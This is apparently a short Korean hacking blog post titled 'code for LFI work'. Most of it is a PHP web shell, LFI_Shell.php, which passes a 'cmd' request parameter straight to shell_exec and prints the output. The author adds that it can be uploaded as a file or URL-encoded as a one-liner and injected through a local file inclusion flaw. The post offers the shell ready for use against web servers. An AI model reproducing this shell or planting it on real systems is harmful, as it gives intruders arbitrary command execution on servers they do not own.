LFI 작업용 코드

 

 

 

 

LFI_Shell.php

<HTML><BODY>
<FORM METHOD="GET" NAME="My_LFI_Form" ACTION="">
<INPUT TYPE="TEXT" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php
header('Content-type: text/html; charset=euc-kr');
$cmd = isset($_GET['cmd']);
if($cmd) {
  $flag = shell_exec($_GET['cmd']." 2>&1");
  echo $flag;
  }
?>
</pre>
</BODY></HTML>

 

 

 

버프로 작업해도 되지만

이렇게 따로 폼을 생성해 브라우저에서 작업하면

뭔가 더 그럴싸한 느낌이다.

 

 

파일째 업로드해도 되고

URL 인코딩해 oneliner로 파라미터에 박아도 된다.